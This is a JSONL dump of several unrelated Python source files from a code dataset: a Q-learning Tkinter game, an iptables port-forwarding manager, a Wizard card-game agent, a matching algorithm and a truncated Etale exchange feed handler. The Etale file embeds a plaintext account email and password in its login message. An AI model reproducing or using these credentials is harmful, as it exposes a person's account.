namespace='/%s/av_sub' % package_name)\r\ndef disconnect():\r\n try:\r\n sid_list.remove(request.sid)\r\n logger.debug('socket_disconnect')\r\n except Exception as e: \r\n logger.error('Exception:%s', e)\r\n logger.error(traceback.format_exc())\r\n\r\ndef socketio_callback(cmd, data, encoding=True):\r\n if sid_list:\r\n if encoding:\r\n data = json.dumps(data, cls=AlchemyEncoder)\r\n data = json.loads(data)\r\n logger.debug(cmd)\r\n logger.debug(data)\r\n socketio.emit(cmd, data, namespace='/%s/av_sub' % package_name, broadcast=True)\r\n \r\n","sub_path":"logic_av_sub.py","file_name":"logic_av_sub.py","file_ext":"py","file_size_in_byte":12320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"568556650","text":"# Implement a function void reverse(char* str) in C or C++\n# which reverses a null-terminated string.\n\ndef rec_rev(tmp):\n if len(tmp) == 0:\n return ''\n return rec_rev(tmp[1:]) + tmp[0]\n\nassert rec_rev('abcde') == 'edcba'\nassert rec_rev('andds') == 'sddna'\n","sub_path":"algorithms_DS/COURSES/CtCI/ch01/1.2-reverse_string.py","file_name":"1.2-reverse_string.py","file_ext":"py","file_size_in_byte":269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"265942908","text":"from tkinter import *\nfrom tkinter import messagebox\nimport numpy as np\nimport numpy.random as rand\nimport random\n\n\ngame = Tk()\ngame.title('Paddi')\n\nagentImg = PhotoImage(file=\"agent.png\")\nKn = PhotoImage(file=\"normalKey.png\")\nKs = PhotoImage(file=\"specialKey.png\")\n\nAI = False\n\n#Board variables\nboard_config = [['w','w','w','g'],['g','w','w','G'],['g','w','g','g']]\nkeys_config = [['Ks',(0,0)],['Kn',(1,2)]]\nlocked_config = [[(0,0),'Kn'],[(3,1),'Ks']]\n\n#Agent variables\nagentPos = (2,1)\nagentLPos = 
None\nagentKeys= []\n\n#Board graphics\n\ndef setupBoard():\n ##missing automatic locked cells \"relief\" choice\n for y in range(len(board_config)):\n for x in range(len(board_config[0])):\n if board_config[y][x] == 'w':\n label = Label(game, width='20', height='3', bg='white', borderwidth=2, relief=\"flat\")\n label.grid(row=y,column=x)\n elif board_config[y][x] == 'g':\n label = Label(game, width='20', height='3', bg='grey', borderwidth=2, relief=\"flat\")\n label.grid(row=y, column=x)\n elif board_config[y][x] == 'G':\n label = Label(game, width='20', height='3', bg='green', borderwidth=2, relief=\"solid\")\n label.grid(row=y, column=x)\n else:\n label = Label(game, width='20', height='3', bg='black', borderwidth=2, relief=\"flat\")\n label.grid(row=y, column=x)\n\n #maybe needs it's own function\n for key in keys_config:\n if key[0] == 'Kn':\n label = Label(game, image=Kn, borderwidth=2, relief=\"flat\")\n label.grid(column=key[1][0],row=key[1][1])\n elif key[0] == 'Ks':\n label = Label(game, image=Ks, borderwidth=2, relief=\"groove\")\n label.grid(column=key[1][0],row=key[1][1])\n else:\n print('no good key')\n\n\ndef initagent():\n label = Label(game, image=agentImg, borderwidth=2, relief=\"flat\")\n label.grid(column=agentPos[0], row=agentPos[1])\n\n\ndef repaint_agent():\n if board_config[agentLPos[1]][agentLPos[0]] == 'w':\n label = Label(game, width='20', height='3', bg='white', borderwidth=2, relief=\"flat\")\n label.grid(row=agentLPos[1], column=agentLPos[0])\n elif board_config[agentLPos[1]][agentLPos[0]] == 'g':\n label = Label(game, width='20', height='3', bg='grey', borderwidth=2, relief=\"flat\")\n label.grid(row=agentLPos[1], column=agentLPos[0])\n elif board_config[agentLPos[1]][agentLPos[0]] == 'G':\n label = Label(game, width='20', height='3', bg='green', borderwidth=2, relief=\"flat\")\n label.grid(row=agentLPos[1], column=agentLPos[0])\n else:\n label = Label(game, width='20', height='3', bg='black', borderwidth=2, relief=\"flat\")\n label.grid(row=agentLPos[1], column=agentLPos[0])\n\n label = Label(game, image=agentImg, borderwidth=2, relief=\"flat\")\n label.grid(column=agentPos[0], row=agentPos[1])\n\n\n#Movement Functions\n\n\ndef canMove(x, y):\n if y < 0 or y > len(board_config)-1:\n return False\n elif x < 0 or x > len(board_config[0])-1:\n return False\n else:\n if board_config[y][x] == 'g':\n return False\n else:\n for lock in locked_config:\n if lock[0] == (x,y):\n if lock[1] not in agentKeys:\n return False\n else:\n return True\n return True\n\n\ndef moveUp(event):\n global agentPos\n global agentLPos\n agentLPos = agentPos\n if canMove(agentPos[0], agentPos[1] - 1):\n agentPos = (agentPos[0],agentPos[1]-1)\n agentMoved()\n\n\ndef moveDown(event):\n global agentPos\n global agentLPos\n agentLPos = agentPos\n if canMove(agentPos[0], agentPos[1] + 1):\n agentPos = (agentPos[0],agentPos[1]+1)\n agentMoved()\n\n\ndef moveLeft(event):\n global agentPos\n global agentLPos\n agentLPos = agentPos\n if canMove(agentPos[0] - 1, agentPos[1]):\n agentPos = (agentPos[0]-1,agentPos[1])\n agentMoved()\n\n\ndef moveRight(event):\n global agentPos\n global agentLPos\n agentLPos = agentPos\n if canMove(agentPos[0] + 1, agentPos[1]):\n agentPos = (agentPos[0]+1,agentPos[1])\n agentMoved()\n\n\ndef agentMoved():\n repaint_agent()\n checkKey()\n\n global AI\n if isGoal() and not AI:\n messagebox.showinfo(\"End Game\", \"The agent reached it's goal\")\n result = messagebox.askokcancel(\"Reset Game ?\",\"Would you like to see Q-Learning AI play?\")\n if result:\n AI = True\n 
reset(True)\n Q_learning_player()\n else:\n reset(False)\n\n\ndef checkKey():\n for key in keys_config:\n if agentPos == key[1] and key[0] not in agentKeys:\n agentKeys.append(key[0])\n\n if board_config[agentPos[1]][agentPos[0]] == 'G' and 'Ks' not in agentKeys: #1 hack for random reset\n agentKeys.append('Ks')\n\n if 'Ks' in agentKeys and 'Kn' not in agentKeys: #2 hack for random reset\n agentKeys.clear()\n agentKeys.append('Kn')\n agentKeys.append('Ks')\n\n\ndef isGoal():\n if board_config[agentPos[1]][agentPos[0]]== 'G':\n return True\n else:\n return False\n\n\ndef reset(r):\n global agentPos\n agentKeys.clear()\n if r:\n possible_pos = []\n for y in range(len(board_config)):\n for x in range(len(board_config[0])):\n if board_config[y][x] == 'w' or board_config[y][x] == 'G':\n possible_pos.append((x,y))\n agentPos = random.choice(possible_pos)\n checkKey()\n else:\n agentPos = (2,1)\n\n setupBoard()\n initagent()\n\n##Game going\n\nsetupBoard()\ninitagent()\n\n##Q-Learning\nX = ['00KnKs', '10', '10Kn', '10KnKs', '11', '11Kn', '11KnKs', '12Kn', '12KnKs', '20', '20Kn', '20KnKs', '21', '21Kn',\n '21KnKs', '31KnKs']\n\nA = ['U','D','L','R']\n\nQ = np.zeros((16,4))\ncost = np.zeros((16,4))\n\ngamma = 0.9\nalpha = 0.3\ner = 0.1\n\niterations = 0\n\n#auxiliar function choosing action\ndef rando_A(Q,x,er):\n i_x = X.index(x)\n Q_x = Q[i_x, :]\n chooser = rand.random()\n if chooser >= er:\n a = A[rand.choice(np.where(Q_x == np.min(Q_x))[0])]#greedy\n else:\n a = rand.choice(A)\n return a\n\ndef Q_learning_player():\n\n x = str(agentPos[0]) + str(agentPos[1]) + ''.join(key for key in agentKeys)\n\n # choose the action act\n act = rando_A(Q, x, er)\n\n step_chance = rand.random()\n if step_chance <= 0.8: # 20% chance of not moving\n if act == 'U':\n moveUp('')\n elif act == 'D':\n moveDown('')\n elif act == 'L':\n moveLeft('')\n elif act == 'R':\n moveRight('')\n\n # compute the cost ct\n cost[X.index(x), A.index(act)] = 1 if not isGoal() else 0\n\n # Calculate x_t+1\n x_t1 = str(agentPos[0]) + str(agentPos[1]) + ''.join(key for key in agentKeys)\n\n # Q-learning\n Q[X.index(x), A.index(act)] = Q[X.index(x), A.index(act)] + alpha * (\n cost[X.index(x), A.index(act)] + gamma * np.min(Q[X.index(x_t1), :]) - Q[X.index(x), A.index(act)])\n\n global iterations\n iterations += 1\n game.title('Paddi -- Iterations = '+str(iterations))\n if iterations >= 4000: #cannot take over +-4100\n messagebox.showinfo(\"Q-Learning\", \"The agent finished it's job after \" + str(iterations)+\" iterations ... 
\\n\"+\n \"Q*: \\n\"+\n str(Q))\n game.quit()\n\n # goal reset\n if isGoal():\n game.after(100,reset,True)\n game.after(100, Q_learning_player)\n\n\ngame.bind('', moveUp)\ngame.bind('', moveDown)\ngame.bind('', moveLeft)\ngame.bind('', moveRight)\ngame.mainloop()","sub_path":"paddiGame.py","file_name":"paddiGame.py","file_ext":"py","file_size_in_byte":7698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"335905498","text":"import sys\ninput = sys.stdin.readline\n\n\ndef dfs(i):\n for want in cow[i]: #소가 원하는 축사들 중\n if check[want]: #이미 방문(검사)했으면 넘어감\n continue\n check[want] = True\n if house[want] == 0 or dfs(house[want]): #축사가 비어있거나, 축사를 선점한 소가 다른 축사에 갈 수 있을 때\n house[want] = i #축사를 소에게 배정해줌\n return True #축사에 소가 들어갔다고 반환\n return False #들어갈 자리가 없다고 반환\n\n\nn, m = map(int, input().split())\n\ncow = [[] for _ in range(n+1)] #소가 원하는 축사를 저장할 리스트\nhouse = [0 for _ in range(m+1)] #축사에 들어있는 소를 저장할 리스트\nres = 0\n\nfor i in range(1, n+1):\n cow[i].extend(list(map(int, input().split()))[1:]) #소가 원하는 축사 저장\n\nfor i in range(1, n+1):\n check = [False for _ in range(m+1)] #방문 여부 리스트\n if dfs(i):\n res += 1\n\nprint(res)\n","sub_path":"algo_py/boj/bj2188.py","file_name":"bj2188.py","file_ext":"py","file_size_in_byte":996,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"224945927","text":"# coding=utf-8\nimport os\nimport commands\nimport socket\n\n# 检查当前系统\ndef check_sys():\n global sys\n value = commands.getstatusoutput('cat /etc/redhat-release | grep -q -E -i \"centos\"')\n if value[0] == 0:\n sys = 'centos'\n else:\n value = commands.getstatusoutput('cat / etc / issue | grep - q - E - i \"debian\"')\n if value[0] == 0:\n sys = 'debian'\n else:\n value = commands.getstatusoutput('cat /etc/issue | grep -q -E -i \"ubuntu\"')\n if value[0] == 0:\n sys = 'ubuntu'\n else:\n value = commands.getstatusoutput('cat /etc/issue | grep -q -E -i \"centos|red hat|redhat\"')\n if value[0] == 0:\n sys = 'centos'\n else:\n value = commands.getstatusoutput('cat /proc/version | grep -q -E -i \"debian\"')\n if value[0] == 0:\n sys = 'debian'\n else:\n value = commands.getstatusoutput('cat /proc/version | grep -q -E -i \"ubuntu\"')\n if value[0] == 0:\n sys = 'ubuntu'\n else:\n value == commands.getstatusoutput('cat /proc/version | grep -q -E -i \"centos|red hat|redhat\"')\n if value[0] == 0:\n sys = 'centos'\n else:\n print('此脚本不支持你的系统!')\n os._exit(0)\n\n# 重新运行程序\ndef restart_program():\n os.system('python iptables_forward.py')\n\n# 安装iptables\ndef install_iptables():\n status = commands.getstatusoutput('iptables -V')\n if status[1] != '':\n print('已安装iptables')\n raw_input('按任意键继续')\n restart_program()\n else:\n print('iptables未安装,开始安装~~~')\n if sys == 'centos':\n os.system('yum update&&yum install -y iptables')\n else:\n os.system('apt-get update&&apt-get install -y iptables')\n status = commands.getstatusoutput('iptables -V')\n if status[1] != '':\n print('已完成安装iptables')\n raw_input('按任意键继续')\n restart_program()\n else:\n print('iptables未安装,请检查可能是系统不支持')\n raw_input('按任意键继续')\n os._exit(0)\n\n# 获得ip\ndef get_host_ip():\n try:\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n s.connect(('8.8.8.8', 80))\n ip = s.getsockname()[0]\n finally:\n s.close()\n return ip\n\n# 添加iptables端口转发\ndef add_forward():\n\n forward_ip = raw_input('输入本地ip(回车自动获取):') or get_host_ip()\n print(forward_ip)\n\n forward_port = raw_input('输入本地端口(默认10000):') or '10000'\n print(forward_port)\n\n forwarded_ip = 
raw_input('输入被转发ip:')\n print(forwarded_ip)\n\n forwarded_port = raw_input('输入被转发端口(默认' + forward_port + '):') or forward_port\n print(forwarded_port)\n\n forward_type = raw_input('请输入数字 来选择 iptables 转发类型(默认TCP+UDP):\\n1.TCP\\n2.UDP\\n3.TCP+UDP\\n') or '3'\n\n while forward_type == '1' or '2' or '3':\n if forward_type == '1':\n os.system(\n 'iptables -t nat -A PREROUTING -p tcp -m tcp --dport ' + forward_port + ' -j DNAT --to-destination ' + forwarded_ip + ':' + forwarded_port + '&&'\n 'iptables -t nat -A POSTROUTING -d ' + forwarded_ip + ' -p tcp -m tcp --dport ' + forwarded_port + ' -j SNAT --to-source ' + forward_ip)\n break\n elif forward_type == '2':\n os.system(\n 'iptables -t nat -A PREROUTING -p udp -m udp --dport ' + forward_port + ' -j DNAT --to-destination ' + forwarded_ip + ':' + forwarded_port + '&&'\n 'iptables -t nat -A POSTROUTING -d ' + forwarded_ip + ' -p udp -m udp --dport ' + forwarded_port + ' -j SNAT --to-source ' + forward_ip)\n break\n elif forward_type == '3':\n os.system(\n 'iptables -t nat -A PREROUTING -p tcp -m tcp --dport ' + forward_port + ' -j DNAT --to-destination ' + forwarded_ip + ':' + forwarded_port + '&&'\n 'iptables -t nat -A PREROUTING -p udp -m udp --dport ' + forward_port + ' -j DNAT --to-destination ' + forwarded_ip + ':' + forwarded_port + '&&'\n 'iptables -t nat -A POSTROUTING -d ' + forwarded_ip + ' -p tcp -m tcp --dport ' + forwarded_port + ' -j SNAT --to-source ' + forward_ip + '&&'\n 'iptables -t nat -A POSTROUTING -d ' + forwarded_ip + ' -p udp -m udp --dport ' + forwarded_port + ' -j SNAT --to-source ' + forward_ip)\n break\n else:\n forward_type = raw_input('输入错误!!!\\n请再次输入数字 来选择 iptables 转发类型(默认TCP+UDP):\\n1.TCP\\n2.UDP\\n3.TCP+UDP\\n') or '3'\n choice = raw_input('是否需要继续添加y/n(默认y):') or 'y'\n if choice == 'y':\n add_forward()\n # 开启防火墙的ipv4转发\n os.system('echo -e \"net.ipv4.ip_forward=1\" >> /etc/sysctl.conf&&sysctl -p')\n # 配置iptables开机加载\n if sys == 'centos':\n os.system('service iptables save&&chkconfig --level 2345 iptables on')\n else:\n os.system(\n 'iptables-save > /etc/iptables.up.rules&&echo -e ''#''!/bin/bash\\\\n/sbin/iptables-restore < /etc/iptables.up.rules'' > /etc/network/if-pre-up.d/iptables&&chmod +x /etc/network/if-pre-up.d/iptables')\n else:\n restart_program()\n\n# 清空iptables端口转发\ndef del_all_forwarding():\n num = commands.getstatusoutput('iptables -t nat -vnL POSTROUTING')\n all_num = num[1].count('*')/2\n a = 0\n while a < all_num:\n os.system('iptables -t nat -D POSTROUTING 1&&iptables -t nat -D PREROUTING 1')\n a = a+1\n if a == all_num:\n print('所有规则已清除')\n raw_input('按任意键继续')\n restart_program()\n else:\n print('清除未成功')\n raw_input('按任意键继续')\n restart_program()\n\n# 查看iptables端口转发\ndef view_forwarding():\n show = commands.getoutput('iptables -t nat -vnL POSTROUTING')\n print(show+'\\n以上是你现有的规则')\n raw_input('按任意键回到主菜单')\n restart_program()\n#删除iptables端口转发\ndef del_forwarding():\n show = commands.getoutput('iptables -t nat -vnL POSTROUTING')\n print(show + '\\n以上是你现有的规则')\n raw_input('按任意键继续')\n if show == 'Chain POSTROUTING (policy ACCEPT 460 packets, 28030 bytes)\\npkts bytes target prot opt in out source destination':\n raw_input('你没有任何端口转发,按任意键回主菜单')\n restart_program()\n else:\n no = raw_input('你想删除的规则序号(如1,2,3,4):')\n output = commands.getoutput('iptables -t nat -D POSTROUTING '+no+'&&iptables -t nat -D PREROUTING '+no)\n if output == 'iptables: Bad rule (does a matching rule exist in that chain?).':\n raw_input('你还没有添加规则或是没有输入序号,按任意键回到主菜单')\n restart_program()\n else:\n print('规则已删除')\n choice = 
raw_input('是否继续删除y/n(默认y):') or 'y'\n if choice == 'y':\n del_forwarding()\n else:\n print('回到主菜单')\n restart_program()\n\ncheck_sys()\n\nprint('你当前的系统为'+sys)\n\nselect = raw_input('iptables端口转发一键管理脚本\\n'\n '--------------------\\n'\n '1.安装iptables\\n'\n '2.清空iptables端口转发\\n'\n '--------------------\\n'\n '3.添加iptables端口转发\\n'\n '4.查看iptables端口转发\\n'\n '5.删除iptables端口转发\\n'\n '--------------------\\n'\n '6.退出当前脚本\\n'\n '注意:初次使用前请请务必执行 1.安装iptables(不仅仅是安装)\\n\\n'\n '请输入数字 [1-6]:')\nif select == '1':\n install_iptables()\nelif select == '2':\n del_all_forwarding()\nelif select == '3':\n add_forward()\nelif select == '4':\n view_forwarding()\nelif select == '5':\n del_forwarding()\nelif select == '6':\n os._exit(0)\nelse:\n raw_input('输入出错,请重新输入,按任意键继续')\n restart_program()","sub_path":"iptables_forward.py","file_name":"iptables_forward.py","file_ext":"py","file_size_in_byte":8516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"522732639","text":"import os\nimport random\nimport collections\nimport numpy as np\n\nfrom game_engine import player\nfrom agents.predictors import NNPredictor\n\nMODELS_PATH = 'models/'\n\n\nclass RuleBasedAgent(player.Player):\n \"\"\"A computer player that makes decision on predefined rules.\n Aims to resemble the performance and behaviour of that of a human.\n Agent functions by calculating the win desirability of the trick and the\n win probability given the cards. It then makes a decision of what card based\n on the probabilities.\n\n Attributes:\n name (str): name of agent\n aggresion (float): see comment below\n use_predictor (bool): if True uses neural net as predictor, else use rule base predictor\n keep_models_fixed (bool): if True, NN is not trained if agent uses it for predictions\n\n \"\"\"\n\n # Use this to print out a trick by trick breakdown of the state of the trick and\n # the action and inferences of the rule-based agent\n DEBUG = False\n\n def __init__(self, name=None, aggression=0.0, use_predictor=False, keep_models_fixed=False):\n super().__init__()\n self.round = 1\n self.num_players = 4\n self.error = 0\n if name is not None:\n self.name = name\n elif use_predictor:\n self.name = self.__class__.__name__ + 'Predictor'\n else:\n self.name = self.__class__.__name__\n\n # aggression is a measure of how high the agent naturally tries to predict. High aggression is good\n # with weak opponents and low aggression for quality opponents. Takes values between -1 and 1.\n self.aggression = RuleBasedAgent.bound(aggression, 1, -1)\n\n self.use_predictor = use_predictor\n self.keep_models_fixed = keep_models_fixed\n\n if self.use_predictor:\n self.predictor_model_path = os.path.join(MODELS_PATH, self.name, 'Predictor/')\n self.predictor = NNPredictor(model_path=self.predictor_model_path, keep_models_fixed=self.keep_models_fixed)\n\n def save_models(self):\n if self.keep_models_fixed:\n return\n if not os.path.exists(self.predictor_model_path):\n os.makedirs(self.predictor_model_path)\n self.predictor.save_model()\n\n def get_prediction(self, trump, num_players):\n \"\"\"This algorithm predicts the amount of tricks that the player should win. It does this assigning\n an expected return for each card and sums all the expected returns together. 
It also takes into\n consideration the aggression of the agent.\n\n Args:\n trump (Card): trump card\n num_players (int): amount of players\n\n Returns:\n int: prediction\n \"\"\"\n\n if self.use_predictor:\n # Neural Network Prediction\n self.prediction_x, prediction = self.predictor.make_prediction(self.hand, trump)\n return prediction\n else:\n # rule based prediction\n self.num_players = num_players\n self.played = []\n self.error += (self.prediction - self.wins)\n prediction = 0\n for card in self.hand:\n if card.value == 14:\n prediction += 0.95 + (0.05 * self.aggression)\n elif card.color == trump.color:\n prediction += (card.value * (0.050 + (0.005 * self.aggression))) + 0.3\n else:\n prediction += (card.value * (0.030 + (0.005 * self.aggression)))\n prediction = round(RuleBasedAgent.bound(prediction, len(self.hand), 0), 0)\n self.prediction = prediction\n return prediction\n\n def announce_result(self, num_tricks_achieved, reward):\n \"\"\"\n Occurs after each round, evaluating the score of the player and resetting round-based variables\n :param num_tricks_achieved:\n :param reward:\n :return:\n \"\"\"\n\n if self.use_predictor:\n super().announce_result(num_tricks_achieved, reward)\n self.predictor.add_game_result(self.prediction_x, num_tricks_achieved)\n\n else:\n self.wins = num_tricks_achieved\n self.reward = reward\n self.score += reward\n self.hand = []\n\n if 60 / self.num_players == self.round:\n self.round = 1\n else:\n self.round += 1\n\n def play_card(self, trump, first, played, players, played_in_game, first_player_index):\n \"\"\"\n Finds the card whose win probability most closely matches that of the win desirability\n :param trump:\n :param first:\n :param played:\n :param players:\n :param played_in_game:\n :param first_player_index\n :return: best_card\n \"\"\"\n played = list(filter(lambda card: not card is None, played.values()))\n played_in_game = sum(played_in_game.values(), [])\n\n win_desirability = self.win_desirability(players)\n best_card = self.get_playable_cards(first)[0]\n best_delta = abs(win_desirability - self.win_probability(played, best_card, trump, first, players,\n played_in_game))\n best_win_likelihood = 0\n round_winning_cards = []\n # calculates the win probability for every playable card\n for card in self.get_playable_cards(first):\n if card != best_card:\n win_likelihood = self.win_probability(played, card, trump, first, players, played_in_game)\n if win_likelihood == 1: round_winning_cards.append(card)\n delta = abs(win_desirability - win_likelihood)\n # tries to find a card that minimizes the delta between the win desirability and the win probability\n if delta < best_delta:\n best_card = card\n best_delta = delta\n if win_likelihood > best_win_likelihood: best_win_likelihood = win_likelihood\n # If going to lose anyway then play the worst card (the one with the greatest number of stronger cards)\n played_cards = played_in_game\n if best_win_likelihood == 0:\n if win_desirability > 0:\n counter = 0\n for card in self.get_playable_cards(first):\n number_of_stronger_cards = self.number_of_stronger_cards_remaining(card, trump, first, played_cards)\n if number_of_stronger_cards > counter:\n best_card = card\n counter = number_of_stronger_cards\n else: # we want to get rid of our most valuable card\n counter = 60\n for card in self.get_playable_cards(first):\n number_of_stronger_cards = self.number_of_stronger_cards_remaining(card, trump, first, played_cards)\n if number_of_stronger_cards < counter:\n best_card = card\n counter = 
number_of_stronger_cards\n elif len(round_winning_cards) > 1: # Play the weakest possible winning hand\n counter = 0\n for card in round_winning_cards:\n number_of_stronger_cards = self.number_of_stronger_cards_remaining(card, trump, first, played_cards)\n if number_of_stronger_cards > counter:\n best_card = card\n counter = number_of_stronger_cards\n # debug output after each trick\n if self.DEBUG:\n print(\"\\033[1;32;40mRound: \" + str(self.round) + \" | Trick: \" + str(self.round - len(self.hand) + 1))\n print(\"\\033[1;37;40mPlayed: \" + str(played) + \" | Total Cards Played: \" + str(len(played_in_game)))\n print(\"Prediction: \" + str(self.prediction) + \" | Wins: \" + str(self.wins))\n print(\"Hand: \" + str(self.hand) + \" | Trump: \" + str(trump))\n print(\"Win Probability: \" + str(self.win_probability(played, best_card, trump, first, players,\n played_in_game)) + \" | Win Desirability: \" + str(\n win_desirability))\n print(\"Chosen Card: \" + str(best_card) + \" | \" + str(\n self.number_of_stronger_cards_remaining(best_card, trump, first, played_in_game)))\n self.hand.remove(best_card)\n return best_card\n\n def get_trump_color(self):\n \"\"\"\n Determines trump color by choosing the color the agent has the most of in its hand\n Returns:\n str: color of trump\n \"\"\"\n color_counter = collections.Counter()\n for card in self.hand:\n color = card.color\n if color == \"White\":\n continue\n color_counter[color] += 1\n if not color_counter.most_common(1):\n return self.hand[random.randint(0, len(self.hand) - 1)].color\n else:\n return color_counter.most_common(1)[0][0]\n\n def win_probability(self, played, card, trump, first, players, played_in_game):\n \"\"\"\n Given a card and the current state, this algorithm calculates the probability of winning by seeing if the card is\n stronger than those already played and estimates the chance that a stronger card will be played in the future.\n :param played:\n :param card:\n :param trump:\n :param first:\n :param players:\n :return: probability of winning\n \"\"\"\n if first is None: # The probability I win is based only on the possibility that another agent has a\n # stronger card and plays it\n probability = ((61 - len(played_in_game) - len(self.hand)) -\n self.number_of_stronger_cards_remaining(card, trump, first, played_in_game)) \\\n / (61 - len(played_in_game) - len(self.hand))\n return probability\n else:\n for other_card in played:\n if self.round == (60 / len(players)): trump = first\n # if there is a played card stronger than this card then the probability is instantly 0\n if self.strongest_card(other_card, card, trump, first) == True:\n return 0\n if len(played) == len(players) - 1:\n # However if there is no stronger card and the agent is the last to play then the probability is 1\n return 1\n else:\n # if not then calculate the probability as before (based on how many stronger cards remain\n probability = ((61 - len(played_in_game) - len(self.hand)) - self.number_of_stronger_cards_remaining(\n card, trump, first, played_in_game)) \\\n / (61 - len(played_in_game) - len(self.hand))\n return probability\n\n def win_desirability(self, players):\n \"\"\"\n Approximates the desire to win based on how many rounds are left to play and how many predictions are left to make\n and also dependent on how many tricks left for the opposition to make\n :param players:\n :return: win desirability\n \"\"\"\n if (self.prediction - self.wins) >= len(self.hand):\n return 1\n elif self.prediction <= self.wins:\n return 0\n else:\n desirability 
= 1.3 * (self.prediction - self.wins) / len(self.hand)\n for player in players:\n if player != self:\n desirability += (1 / (len(players) + 1)) * (player.prediction - player.wins) / len(self.hand)\n desirability += 0.1 * np.cos((self.round - len(self.hand)) * (np.pi / self.round))\n return RuleBasedAgent.bound(desirability, 1, 0)\n\n @staticmethod\n def bound(value, max, min):\n \"\"\"\n Bounds the value between a given range.\n :param value:\n :param max:\n :param min:\n :return: a value between the maximum and minimum\n \"\"\"\n if value > max:\n return max\n elif value < min:\n return min\n else:\n return value\n\n def cards_left_by_color(self, color, target_card, played_in_game):\n \"\"\"\n Keeps track of all cards played in that round and deduces how many cards of that color are left\n :param color:\n :param card: removes this card from the counting procedure\n :return: number_of_cards_of_that_color_left\n \"\"\"\n all_cards_left = []\n for card in played_in_game:\n all_cards_left.append(card)\n for card in self.hand:\n all_cards_left.append(card)\n all_cards_left.remove(target_card)\n cards_by_color_left = []\n for card in all_cards_left:\n if card.color == color:\n cards_by_color_left.append(card)\n return cards_by_color_left\n\n def number_of_stronger_cards_remaining(self, card, trump, first, played_in_game):\n \"\"\"\n Estimates the number of stronger cards remaining in the deck\n :param card:\n :param trump:\n :param first:\n :param played_in_game:\n :return: number of stronger cards\n \"\"\"\n if card.value == 14: return 0\n if card.value == 0: return 61 - len(played_in_game) - len(self.hand)\n played_wizard_counter = 0\n played_trump_higher_counter = 0\n played_trump_lower_counter = 0\n played_second_trump_higher_counter = 0\n played_second_trump_lower_counter = 0\n played_remainder_counter = 0\n for played_card in played_in_game:\n if played_card.value == 14: played_wizard_counter += 1\n for played_card in self.cards_left_by_color(trump.color, card, played_in_game):\n if played_card.value > card.value:\n played_trump_higher_counter += 1\n else:\n played_trump_lower_counter += 1\n if first is None:\n color = card.color\n else:\n color = first.color\n for played_card in self.cards_left_by_color(color, card, played_in_game):\n if played_card.value > card.value:\n played_second_trump_higher_counter += 1\n else:\n played_second_trump_lower_counter += 1\n for other_color in [\"Red\", \"Green\", \"Yellow\", \"Blue\"]:\n if other_color != trump and other_color != color:\n for played_card in self.cards_left_by_color(other_color, card, played_in_game):\n if played_card.value > card.value: played_remainder_counter += 1\n\n # If it is the last round then ignore trumps\n if self.round == (60 / self.num_players):\n stronger_cards = (13 - played_second_trump_higher_counter - card.value) + (4 - played_wizard_counter)\n # The amount of stronger cards is dependent on the amount of higher cards minus those already played\n elif card.color == trump.color: # for trump colored card\n stronger_cards = (13 - played_trump_higher_counter - card.value) + (4 - played_wizard_counter)\n elif first is not None and card.color == first.color: # for a card that has the same colour as the first\n stronger_cards = (13 - played_second_trump_higher_counter - card.value) + \\\n (12 - played_trump_higher_counter - played_trump_lower_counter) + (\n 4 - played_wizard_counter)\n else: # if the color of the card is none of them\n stronger_cards = (12 - played_trump_higher_counter - played_trump_lower_counter) + \\\n (12 
- played_second_trump_higher_counter - played_second_trump_lower_counter) + \\\n (24 - played_remainder_counter - card.value * 2) + (4 - played_wizard_counter)\n # checks to see that the amount of stronger cards is not greater than the amount of cards already left\n if stronger_cards > (61 - len(played_in_game) - len(self.hand)):\n return (61 - len(played_in_game) - len(self.hand))\n else:\n return stronger_cards\n\n def strongest_card(self, new_card, old_card, trump, first_card):\n \"\"\"Determines whether the new played card wins the trick\n\n :param new_card: card that contests with current winning card\n :param old_card: card currently winning the trick\n :param trump:\n :param first_card: first card played. Determines the suit of the trick. May be None\n :return: bool: True if the new_card wins, taking into account trump colors, first_card color and order.\n \"\"\"\n\n # If a Z was played first, it wins.\n if old_card.value == 14:\n return False\n # If not and the new card is a Z, the new card wins.\n if new_card.value == 14:\n return True\n # First N wins, so if the second card is N, it always wins.\n if new_card.value == 0:\n return False\n # Second N wins only if new_card is NOT N.\n elif old_card.value == 0:\n return True\n # If they are both colored cards, the trump color wins.\n if old_card.color == trump.color:\n if new_card.color != trump.color:\n return False\n else: # If both are trump color, the higher value wins.\n return old_card.value < new_card.value\n else:\n # old_card is not trump color, then if new_card is, new_card wins\n if new_card.color == trump.color:\n return True\n else:\n # Neither are trump color, so check for first color.\n if old_card.color == first_card.color:\n if new_card.color != first_card.color:\n # old card is first_card color but new card is not, old wins.\n return False\n else:\n # Both are first_card color, bigger value wins.\n return old_card.value < new_card.value\n","sub_path":"agents/rule_based_agent.py","file_name":"rule_based_agent.py","file_ext":"py","file_size_in_byte":17991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"637167897","text":"import asyncio\nimport json\nimport logging\n\nfrom datetime import datetime, timedelta\nfrom decimal import Decimal\nfrom pytz import UTC\nfrom time import sleep, time\n\nfrom sortedcontainers import SortedDict as sd\n\nfrom cryptofeed.feed import Feed\nfrom cryptofeed.defines import ETALE, L2_BOOK, TRADES, CANDLES, BUY, SELL, BID, ASK, FEE\nfrom cryptofeed.standards import pair_exchange_to_std\n\nwss_url = 'wss://api-uat.etale.com/api'\nauth = json.dumps({'type':'LOGIN','username':'orens77@gmail.com','password':'i5P5lSyq0K'})\n\nLOG = logging.getLogger('feedhandler')\n\ndef etale_pair_exchanges(auth):\n ''' \n not the best way to get pairs\n we have to send auth to just get the api to respond so when it does respond \n it automatically sends all your balances which we have to ignore\n '''\n import json\n from websocket import create_connection\n wss_url = 'wss://api-uat.etale.com/api'\n ws = create_connection(wss_url)\n ws.send(auth)\n ws.send(json.dumps({\"type\":\"MARKET_DATA_CONFIG_REQUEST\"}))\n while ws.connected:\n message = ws.recv()\n msg = json.loads(message)\n msg_type = msg['type']\n if msg_type == 'MARKET_DATA_CONFIG':\n ws.close()\n return {info['pair'] : 